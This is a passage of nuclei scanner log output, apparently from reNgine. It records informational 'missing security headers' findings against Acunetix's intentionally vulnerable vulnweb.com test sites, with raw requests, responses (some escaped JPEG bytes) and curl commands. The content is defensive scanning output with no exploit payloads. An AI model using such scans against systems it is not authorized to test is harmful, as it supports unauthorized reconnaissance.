d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:28.579185229Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:28.784042558Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\